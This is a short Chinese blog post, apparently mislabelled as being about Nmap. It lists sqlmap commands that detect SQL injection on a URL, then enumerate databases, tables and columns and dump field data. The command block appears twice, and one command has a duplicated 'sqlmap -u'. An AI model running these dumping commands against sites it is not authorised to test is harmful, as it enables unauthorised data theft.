Nmap 进行 Web 
2017/12/01 13:21 | by
测试SQL注入:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs
自动探测数据库类型和漏洞,如果成功会列出数据库:
获得某个数据库中的表:
# sqlmap -u sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables
获得表的字段:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns
下载某一字段的数据:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns -C some_col --dump
这款工具也很好用,用来检测SQL漏洞注入比较精确,国内也有好几个SQL注入工具,博主以前也写过注入攻击工具哈;
神器下载地址这里就不提供了,自己搜索吧,反正也没多少人评论留意观看哈。
# sqlmap -u http://www.te...ndex.php?id=1 --dbs
自动探测数据库类型和漏洞,如果成功会列出数据库:
获得某个数据库中的表:
# sqlmap -u sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables
获得表的字段:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns
下载某一字段的数据:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns -C some_col --dump
这款工具也很好用,用来检测SQL漏洞注入比较精确,国内也有好几个SQL注入工具,博主以前也写过注入攻击工具哈;
神器下载地址这里就不提供了,自己搜索吧,反正也没多少人评论留意观看哈。
HelloHK
2018/05/17 14:51
谁说没人留意的呢
无凡 
2018/01/13 15:31
可以发下神器源码出来更好啊
分页: 1/1 
1 
1
